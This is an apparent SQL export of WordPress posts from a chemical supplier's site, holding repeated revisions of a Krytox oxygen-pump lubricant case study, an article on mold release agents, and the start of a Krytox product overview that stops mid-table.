INSERT INTO `wp_posts` VALUES (2413, 2, '2016-10-07 18:16:54', '2016-10-07 18:16:54', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\n\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\n\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\n\n<strong>The Challenge</strong>\n\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\n\n<strong>The Solution</strong>\n\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\n\n<strong>Key Advantages</strong>\n<ul>\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\n</ul>\n<strong>Suggested Product:</strong>\n\n[ux_bestseller_products products="" columns="4" title="Check our bestsellers!"]', 'Krytox Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-autosave-v1', '', '', '2016-10-07 18:16:54', '2016-10-07 18:16:54', '', 2410, 'https://www.miller-stephenson.com/2410-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2414, 2, '2016-10-07 18:13:41', '2016-10-07 18:13:41', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\r\n\r\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\r\n\r\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\r\n\r\n<strong>The Solution</strong>\r\n\r\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\r\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\r\n</ul>\r\n<strong>Suggested Product:</strong>\r\n\r\n[products_pinterest_style products="" cat="krytox-lvp-vpf" columns="4"]', 'Krytox Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-revision-v1', '', '', '2016-10-07 18:13:41', '2016-10-07 18:13:41', '', 2410, 'https://www.miller-stephenson.com/2410-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2415, 2, '2016-10-07 18:31:45', '2016-10-07 18:31:45', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\r\n\r\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\r\n\r\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\r\n\r\n<strong>The Solution</strong>\r\n\r\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\r\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\r\n</ul>\r\n<strong>Suggested Product:</strong>\r\n\r\n[ux_bestseller_products products="954,944,943" columns="4" title="Check our bestsellers!"]', 'Krytox Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-revision-v1', '', '', '2016-10-07 18:31:45', '2016-10-07 18:31:45', '', 2410, 'https://www.miller-stephenson.com/2410-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2416, 2, '2016-10-07 18:32:43', '2016-10-07 18:32:43', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\r\n\r\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\r\n\r\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\r\n\r\n<strong>The Solution</strong>\r\n\r\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\r\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\r\n</ul>\r\n<strong>Suggested Product:</strong>\r\n\r\n[ux_bestseller_products products="3" columns="3" title="Check our bestsellers!"]', 'Krytox Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-revision-v1', '', '', '2016-10-07 18:32:43', '2016-10-07 18:32:43', '', 2410, 'https://www.miller-stephenson.com/2410-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2417, 2, '2016-10-07 18:34:21', '2016-10-07 18:34:21', '<p><strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong></p>\n<p><strong>Steel manufacturer in India ensures safety while cutting costs</strong></p>\n<p>A steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.</p>\n<p><strong>The Challenge</strong></p>\n<p>The oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.</p>\n<p><strong>The Solution</strong></p>\n<p>The manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.</p>\n<p><strong>Key Advantages</strong></p>\n<ul>\n<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\n<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\n<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\n</ul>\n<p><strong>Suggested Product:</strong></p>\n[ux_products columns="3" ids="943,944,954" products="3" orderby="sales"]', 'Krytox Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-revision-v1', '', '', '2016-10-07 18:34:21', '2016-10-07 18:34:21', '', 2410, 'https://www.miller-stephenson.com/2410-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2418, 2, '2016-10-07 18:35:36', '2016-10-07 18:35:36', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\r\n\r\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\r\n\r\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\r\n\r\n<strong>The Solution</strong>\r\n\r\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\r\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\r\n</ul>\r\n<strong>Suggested Product:</strong>\r\n\r\n[product id="954"][product id="944"][product id="943"]', 'Krytox Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-revision-v1', '', '', '2016-10-07 18:35:36', '2016-10-07 18:35:36', '', 2410, 'https://www.miller-stephenson.com/2410-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2419, 2, '2016-10-07 18:36:26', '2016-10-07 18:36:26', '', 'Oxygen Pump Lubricant', '', 'inherit', 'closed', 'closed', '', 'shutterstock_371036624', '', '', '2016-10-07 18:36:47', '2016-10-07 18:36:47', '', 2410, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_371036624.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2420, 2, '2016-10-07 18:36:53', '2016-10-07 18:36:53', '<strong>Oxygen Pump Lubricant for an Indian steel manufacturer saves money</strong>\r\n\r\n<strong>Steel manufacturer in India ensures safety while cutting costs</strong>\r\n\r\nA steel manufacturer located in India wanted to find a more cost-effective gearbox lubricant for its oxygen pumps, but did not want to compromise the performance or safety of its operations. The manufacturer wanted to proceed cautiously, conducting validation tests before making any decisions to switch lubricants.\r\n\r\n<strong>The Challenge</strong>\r\n\r\nThe oxygen pumps at the steel plant are used to transfer liquid oxygen. Therefore, the oxygen pump lubricant chosen for the gearbox, which is located between the oxygen pump and the electrical motor, needed to be nonflammable and nonreactive with liquid oxygen.\r\n\r\n<strong>The Solution</strong>\r\n\r\nThe manufacturer tested <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> in several of its oxygen pump gearboxes over the course of two years and was convinced that this lubricant offered the performance and safety it required for this demanding application. Following this validation period, the manufacturer began using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant in all of its oxygen pump gearboxes and is realizing an annual cost savings of $2,000 USD.\r\n\r\n<strong>Key Advantages</strong>\r\n<ul>\r\n 	<li>Using <a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> lubricant, the manufacturer was able to save $2,000 annually while continuing optimum operation of the gearboxes in its oxygen pumps.</li>\r\n 	<li>Krytox™ lubricants from Chemours have been independently tested by major corporations and organizations, and they have been confirmed for use with oxygen and other reactive chemical compatibility.</li>\r\n 	<li><a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox™ VPF 1514</a> can be safely used in oxygen and reactive gas service equipment.</li>\r\n</ul>\r\n<strong>Suggested Products:</strong>\r\n\r\n[product id="954"][product id="944"][product id="943"]\r\n\r\n&nbsp;', 'Krytox Oxygen Pump Lubricant Case Study', '', 'inherit', 'closed', 'closed', '', '2410-revision-v1', '', '', '2016-10-07 18:36:53', '2016-10-07 18:36:53', '', 2410, 'https://www.miller-stephenson.com/2410-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2421, 2, '2016-10-07 18:45:43', '2016-10-07 18:45:43', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16,20" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-07 18:45:43', '2016-10-07 18:45:43', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2422, 55, '2016-10-07 19:29:44', '2016-10-07 19:29:44', '', '', '', 'publish', 'closed', 'closed', '', '2422', '', '', '2016-10-07 19:29:44', '2016-10-07 19:29:44', '', 0, 'https://www.miller-stephenson.com/nf_sub/2422/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2423, 3, '2016-10-07 19:30:28', '2016-10-07 19:30:28', 'Mold release agents provide the critical barrier between a molding surface and the substrate, facilitating separation of the cured part from the mold. Without such a barrier in place the substrate would become fused to the mold surface, resulting in difficult clean-up and dramatic loss in production efficiency. Even when a mold release agent is used, factors such as irregular applications or improper release agent choice will have a dramatic effect on the quality and consistency of your finished product. It is therefore critical that  engineers understand what types of mold release agents are available and which variant would compliment their production method.  There are several distinct release agent agents: Sacrificial, PVA (polyvinyl alcohol), PTFE (polytetrafluoroethylene), and Thermoset polysiloxanes.  Critical criteria for each release agent to meet is the following:\r\n<ul>\r\n 	<li>Surface adhesion and durability</li>\r\n 	<li>Ability to form a thin-film</li>\r\n 	<li>Sufficient surface slip</li>\r\n 	<li>Chemical inertness to the molding process and molding substrate</li>\r\n 	<li>Number of releases per application</li>\r\n</ul>\r\nRelease agents types and individual products within those types, vary significantly in regard to slip, application methods, production efficiency and cost. For that reason,  manufacturers who invest time researching and testing release agents will see a return on that investment once an optimized agent is found.  Sacrificial (typically waxes and silicone oils) and PVA release agents are the lowest cost materials, offering adequate slip and chemical inertness.  Unfortunately these agents must be re-applied after each molding cycle, and will transfer to the molding part.  This result in time-consuming cleaning of the molded part.  Interestingly, while the initial cost may be lower for the sacrificial and PVA release agents, the overall cost is substantially more as one can expect  more releases per application and little to no post-operation cleaning with PTFE and thermosett resins.\r\n\r\nMiller-Stephenson specializes in providing only the highest performing and cost-effective mold release solutions for it customers, hence our companies specializes in providing PTFE and thermosetting polysiloxane release agent agents.  In an effort to help guide process engineers in selecting which agent would work best for their molding application we have summarized the leading attributes for each of our agents.\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/release-agents/ptfe-release-agent/"><strong>PTFE Release Agents</strong></a>\r\n\r\n[caption id="attachment_1559" align="alignleft" width="256"]<img class="wp-image-1559" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PTFE-mold-release-800x678.jpg" alt="ptfe-mold-release" width="256" height="216" /> Intricate molding die, an ideal application of the Miller-Stephenson\'s MS-122AV[/caption]\r\n\r\nMiller-Stephenson\'s PTFE mold release agents(MS-122/143) utilize low-molecular weight and particle size fluoropolymers to achieve ultra-uniform thin films that exhibit excellent surface adhesion and durability. PTFE-release agents contain no silicones, surfactants, or waxes and are thermally stable up to 600F.  These release agents generate a dry film on the mold surface, which is chemical inert, non-migrating and non-staining.  Formulations for this class of fluoropolymer can be solvent or water-based and application is typically performed with brushing, hand wiping, or aerosolization. Once the solvent is dried, the release coating is ready for operation, no  additional cure time is needed. Fluoropolymer release agents are particularly useful in rubber-to-metal bonding operations or when molding silicone or fluorosilicone polymers and elastomers.  PTFE has exceptional utility and can be use in compression and transfer molding operations, however due to its relatively low slip, it can be ineffective with injection molding operations.  Production engineers will typically choose PTFE-based release agents if they are looking for a non-silicone, chemical inert, and non-transferable release agent that is applicable across a broad range of substrates. PTFE, on a release per application basis is significantly more efficient and cost-effective than sacrificial or PVA alternatives.  Miller-Stephenson\'s MS-122AV and MS-122SE are formulations which increase the durability and cost-effectiveness even further by addition of proprietary surface activation chemistry.\r\n\r\n<strong>Thermoset polysiloxanes</strong>\r\n\r\n[caption id="attachment_1561" align="alignleft" width="272"]<img class="wp-image-1561" src="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-polysiloxane-800x530.jpg" alt="releasys-polysiloxane" width="272" height="180" /> ReleaSys excels are molding of large composite structures, yielding efficient release cycle after cycle.[/caption]\r\n\r\nThermoset polysiloxanes are the newest generation of mold release agents, designed to crosslink and bind to the mold surface.  These semi-permanent mold release agents generate robust thin-films onto the mold surface, enabling numerous molding cycles to be completed with a single application.  Typically, thermosets require a cure-time to allow sufficient crosslinking and surface adhesion. Cured films are extremely durable, chemically-resistant, have high surface slip, and have temperature stability up to 410F.  Properly applied as a thin film, the release agent will not transfer to parts and therefore will not interfere with secondary adhesive bonds or coating operations.  Over application, however, may result in transfer, so Miller-Stephenson generally recommends training in the product\'s use by one of our technical staff.   Semi-permanents polysiloxanes can be designed to exhibit varying levels of slip, durability, and cure times.  Miller-Stephenson\'s new ReleaSys product line offers the most advanced semi-permanent thermoset mold release agents available.  ReleaSys excels in compression, transfer, and injection molding and is compatible with a broad range of resins and elastomers. Our formulations are particularly useful in geometrically complex molds or when using abrasive molding substrates.  ReleaSys should not be used to mold any silicone or fluorosilicone based products.  Application can be performed via aerosolization or brushing/wiping and formulations come as either solvent or water-based.  ReleaSys is Miller-Stephenson\'s most cost-effective, highest performing release agent capable of dramatically reduced re-application frequency, greater product throughput, and lower rejection rates.\r\n\r\nMiller-Stephenson mold release agents are backed by over 40 years of research and development and are relied upon by global industries to ensure efficient, cost effective, and high quality release of their molded parts. By pioneering release agent solutions for many of the largest manufacturing organizations, Miller-Stephenson understands what it takes to release the most complex materials in the most demanding molding applications. We have solutions which are optimized for your molding operations; from airplane stow bins to O-rings, carbon-fiber bike frames to tires, Miller-Stephenson has a solution for your molding operation.\r\n\r\n[ux_product_categories ids="21,16" number="10"]\r\n\r\nTo learn more about our mold release agents please <a href="https://www.miller-stephenson.com/chemicals/release-agents/">click here.</a>', 'Mold Release Agents: Which is right for you?', '', 'inherit', 'closed', 'closed', '', '1525-revision-v1', '', '', '2016-10-07 19:30:28', '2016-10-07 19:30:28', '', 1525, 'https://www.miller-stephenson.com/1525-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2425, 0, '2016-10-07 19:47:22', '2016-10-07 19:47:22', '', '', '', 'publish', 'closed', 'closed', '', '2425', '', '', '2016-10-07 19:47:22', '2016-10-07 19:47:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/2425/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2426, 2, '2017-06-01 17:17:27', '2017-06-01 17:17:27', '<h2 style="text-align: center;">Krytox History &amp; Product Overview</h2>\n<h3><strong>For the full Krytox <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">product list, click here.</a></strong></h3>\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gearbox lubricant, and even gyroscope oil.\n\nIn 1964, new perfluoropolyether (PFPE)-based grease formulations, developed jointly with the U.S. Navy and Air Force. The result being MIL-G-27617, developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\n\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, a very wide range of industries and applications adopted PFPE-based oils and greases. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\nToday, of course, it’s our well-known trademark for high-performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\n\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\n\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\n<table width="1455">\n<tbody>\n<tr>\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\n</tr>\n<tr>\n<td colspan="3">\n<h4><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></h4>\n</td>\n</tr>\n<tr>\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\n<td>The GPL 10X oil &amp; 20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\n</tr>\n<tr>\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\n<td>The GPL 21X series contains molybdenum disulfide for extreme 